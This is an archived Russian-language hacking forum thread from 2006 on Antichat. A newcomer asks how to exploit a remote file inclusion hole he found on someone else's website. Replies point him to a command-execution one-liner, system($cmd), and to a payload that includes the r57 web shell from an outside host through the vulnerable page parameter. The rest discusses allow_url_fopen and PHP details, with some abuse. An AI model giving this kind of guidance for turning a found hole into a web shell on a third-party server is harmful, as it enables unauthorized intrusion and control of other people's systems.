Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Объясните пожалуйста, нашел php-inj, что можно с нею сделать? |
03.09.2006, 02:36
|
|
Новичок
Регистрация: 29.08.2006
Сообщений: 4
Провел на форуме:
10593
Репутация:
0
|
|
Объясните пожалуйста, нашел php-inj, что можно с нею сделать?
На одном из сайтов нашел возможность инклуда файла в параметр страницы page=http://mysite.com/icx и файл icx.php выполнеятся. Что можно с этим сделать? Например использовать shell(я в этом темный, объясните или пошлите куда-то прочитать, что оно есть ... и ссылку откуда скачать можно шелл с манулом  ) )Ну или считать содержимое файлов как? Вот таким кодом хочу считать содержимое файла
PHP код:
if (fopen("http://www.somesite.com/main.php", "r")) {
echo "I can open it!";
$lines = file("http://www.somesite.com/main.php")
foreach ($lines as $line_num => $line) {
echo "#<b>{$line_num}</b> : " . htmlspecialchars($line) . "<br />\n";
}
Выдает такую ошибку
#1 : <b>Fatal error</b>: Call to undefined function: showmain() in <b>/home/somesite/public/main.php</b> on line <b>2</b><br />
//by SMiX: Код php суем в тег [php]
Последний раз редактировалось SMiX; 03.09.2006 в 13:16..
|
|
|
03.09.2006, 02:47
|
|
Участник форума
Регистрация: 24.03.2006
Сообщений: 184
Провел на форуме:
344009
Репутация:
72
|
|
иче
Распичатой на бумажке с форматом а4
Сходи с ней в туалет ............ потересь ей
поймеш какая плохая ошибка
|
|
|
|
03.09.2006, 09:07
|
|
Новичок
Регистрация: 29.08.2006
Сообщений: 4
Провел на форуме:
10593
Репутация:
0
|
|
Простейший способ <?php system($cmd);?>
Я так понял эта беда там отключена, пробовал, не пашет...
Распичатой на бумажке с форматом а4
Сходи с ней в туалет ............ потересь ей
поймеш какая плохая ошибка
лечимся...
|
|
|
|
03.09.2006, 09:19
|
|
Познающий
Регистрация: 17.12.2005
Сообщений: 78
Провел на форуме:
464418
Репутация:
23
|
|
Попробуй page=http://rst.void.ru/download/r57shell.txt?
Сможешь выполнять команды, просматривать дирректории... Вобщем, действительно, поищи на ачате, найдешь все, что нужно. Советую посмотреть видео по подобной темматике(VIDEO.ANTICHAT.RU )
|
|
|
|
03.09.2006, 13:20
|
|
Участник форума
Регистрация: 25.07.2005
Сообщений: 246
Провел на форуме:
457850
Репутация:
174
|
|
#1 : <b>Fatal error</b>: Call to undefined function: showmain() in <b>/home/somesite/public/main.php</b> on line <b>2</b><br />
А можно весь код посмотреть?
ПыСька: В таких случаях не используем двойные кавычки, ибо производительность уменьшается. Двойные кавычки пхп парсит на наличие переменных, а у тебя там переменных нет - медвежий труд.
|
|
|
|
03.09.2006, 18:03
|
|
Members of Antichat - Level 5
Регистрация: 05.04.2006
Сообщений: 1,066
Провел на форуме:
3493315
Репутация:
1228
|
|
ну на сколько я помню то функцией fopen() можно открывать только файлы расположенный на том же сайте что и сам файл с функцией....
|
|
|
|
03.09.2006, 21:26
|
|
Участник форума
Регистрация: 25.07.2005
Сообщений: 246
Провел на форуме:
457850
Репутация:
174
|
|
nc.STRIEM ты не прав. Такое будет только если хостер спецом так настроит php.ini. По умолчанию урлы fopen открывать может.
|
|
|
|
03.09.2006, 22:44
|
|
Участник форума
Регистрация: 02.05.2006
Сообщений: 193
Провел на форуме:
530613
Репутация:
25
|
|
Марсеанчег кидай строчку на который есть showmain() -))) или весь код )
|
|
|
|
05.09.2006, 01:33
|
|
Участник форума
Регистрация: 24.03.2006
Сообщений: 184
Провел на форуме:
344009
Репутация:
72
|
|
вот
тут меня попросили нормально написать пишу
вот из мана {
HTTP-соединения являются read-only; вы не можете записывать данные или копировать файлы в HTTP-ресурс.
}
fopen('http://vasya.narod.ru/file','r')
будет открыто соидение http если в php.ini стоит
allow_url_fopen=on
если что обращаейтесть я уже на пхп не первой год пишу
для gadjet
page=http://rst.void.ru/download/r57shell.txt?
если хостер поставил allow_url_fopen=off
то если http://rst.void.ru/download/r57shell.txt обрабатываецо фунций fopen то не фига не получитца
Последний раз редактировалось [loy]; 05.09.2006 в 01:37..
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [loy]](/avatars/avatar23093.gif){kind=avatar}
Похожие темы
Линейный вид
